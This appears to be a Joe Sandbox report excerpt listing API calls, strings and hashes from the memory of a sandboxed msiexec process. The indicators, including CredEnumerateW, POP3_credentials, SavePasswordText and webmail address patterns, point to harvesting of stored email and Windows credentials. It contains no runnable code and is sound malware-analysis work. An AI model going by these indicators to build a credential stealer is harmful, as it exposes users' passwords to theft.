                                                                                                      • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                    • wcslen.MSVCRT ref: 0040874A
                                                                                                    • wcsncmp.MSVCRT ref: 00408794
                                                                                                    • memset.MSVCRT ref: 0040882A
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                    • wcschr.MSVCRT ref: 0040889F
                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                    • API String ID: 3318079752-260894208
                                                                                                    • Opcode ID: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                    • Opcode Fuzzy Hash: f0bd6c6ea0acb8351c112a80c86d09cf3e17917a0d28c26bc0fcaaf70a278575
                                                                                                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                                                                                    • API String ID: 2290531041-1288872324
                                                                                                    • Opcode ID: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                    • Opcode Fuzzy Hash: 30fd5f6f20630edc1b24d3ff7a692dcad865f59df878495865e1d580aa018547
                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004037EB
                                                                                                    • memset.MSVCRT ref: 004037FF
                                                                                                      • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • strchr.MSVCRT ref: 0040386E
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                    • strlen.MSVCRT ref: 00403897
                                                                                                    • sprintf.MSVCRT ref: 004038B7
                                                                                                    • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                                                                    • String ID: %s@yahoo.com
                                                                                                    • API String ID: 2240714685-3288273942
                                                                                                    • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                    • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                    • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                    • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                    • API String ID: 888011440-2039793938
                                                                                                    • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                    • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040F567
                                                                                                    • memset.MSVCRT ref: 0040F57F
                                                                                                      • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                    • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 78143705-3916222277
                                                                                                    • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                    • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                    • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscpy$sprintfstrchrstrlen
                                                                                                    • String ID: %s@gmail.com
                                                                                                    • API String ID: 3902205911-4097000612
                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403504
                                                                                                    • memset.MSVCRT ref: 0040351A
                                                                                                    • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                    • _mbscat.MSVCRT ref: 0040356D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                    • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                    • API String ID: 632640181-966475738
                                                                                                    • Opcode ID: 9db740f2358b076d42ab6db5cd0737fece105fa9b754ccc0f00d133d63461810
                                                                                                    • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                    • Opcode Fuzzy Hash: 9db740f2358b076d42ab6db5cd0737fece105fa9b754ccc0f00d133d63461810
                                                                                                    • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                    • String ID:
                                                                                                    • API String ID: 3642520215-0
                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
• String ID:
• API String ID: 1999381814-0
Similarity
• API ID: memcpymemset
• String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
• API String ID: 1297977491-3883738016
APIs
  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
  • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
• memcpy.MSVCRT(?,?,00000040), ref: 0044972E
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
• memcpy.MSVCRT(?,?,00000040), ref: 004497F6
  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
  • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
• memcpy.MSVCRT(?,?,00000000), ref: 00449846
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
Similarity
• API ID: __aulldvrm$__aullrem
• String ID: -$-x0$0123456789ABCDEF0123456789abcdef
• API String ID: 643879872-978417875
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405827
• SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
• SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
• SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
• memset.MSVCRT ref: 004058C3
• SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
• SetFocus.USER32(?), ref: 00405976
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`#v,00000000,?,?,0040A7BE,00000001,0044CBC0,76230A60), ref: 00406D4D
• _mbscat.MSVCRT ref: 0040A8FF
• sprintf.MSVCRT ref: 0040A921
Similarity
• API ID: FileWrite_mbscatsprintfstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 1631269929-4153097237
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,68137B60,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
APIs
• memset.MSVCRT ref: 004076D7
• sprintf.MSVCRT ref: 00407704
• strlen.MSVCRT ref: 00407710
• memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
• strlen.MSVCRT ref: 00407733
• memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
APIs
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
• ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
• SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
• ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
• CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 82305771-620537770
                                                                                                    • Opcode ID: 06952686c39ef77086e9f0f234c990abac79310d7785f02afc60b77600e658f7
                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                    • Opcode Fuzzy Hash: 06952686c39ef77086e9f0f234c990abac79310d7785f02afc60b77600e658f7
                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000010.00000002.2589379831.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
• Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
• Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
• Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
• memset.MSVCRT ref: 00410246
• memset.MSVCRT ref: 00410258
  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
• memset.MSVCRT ref: 0041033F
• _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
• CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
Memory Dump Source
• Source File: 00000010.00000002.2589379831.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000010.00000002.2589379831.0000000000456000.00000040.80000000.00040000.00000000.sdmp
